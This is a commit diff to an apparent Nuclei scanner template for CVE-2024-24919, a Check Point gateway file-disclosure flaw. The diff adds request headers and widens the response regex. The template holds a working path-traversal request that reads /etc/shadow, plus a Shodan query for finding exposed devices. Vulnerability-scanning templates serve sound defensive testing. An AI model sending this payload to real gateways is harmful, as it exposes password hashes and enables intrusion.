modified regex and added more request parameters

http/cves/2024/CVE-2024-24919.yaml

@@ -5,37 +5,39 @@ info:
  author: johnk3r
  severity: high
  description: |
- CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.
+ CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.
  reference:
  - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
  - https://support.checkpoint.com/results/sk/sk182337
  metadata:
- verified: true
  max-request: 1
  vendor: checkpoint
  product: quantum_security_gateway
- shodan-query: html:"Check Point SSL Network"
  cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*
+ shodan-query: html:"Check Point SSL Network"
+ verified: true
  tags: cve,cve2024,checkpoint,lfi
 
 http:
  - raw:
  - |
  POST /clients/MyCRL HTTP/1.1
  Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.2.7
+ Content-Length: 39
+ Accept-Encoding: gzip
+ Connection: close
 
  aCSHELL/../../../../../../../etc/shadow
-
  matchers-condition: and
  matchers:
  - type: regex
  part: body
  regex:
- - "root:"
- - "nobody:"
+ - "root:.*"
+ - "nobody:.*"
  condition: and
 
  - type: status
  status:
  - 200
-# digest: 490a0046304402200cbd9f1fc5ea98e5649de5e1b43d62d38241188c12d1f4cf19709e2b2aab31a50220643a5fbf43545d89dd02819e0e92ee7fb898212836c04be5c18d446b1950705d:922c64590222798bb761d5b6d8e72950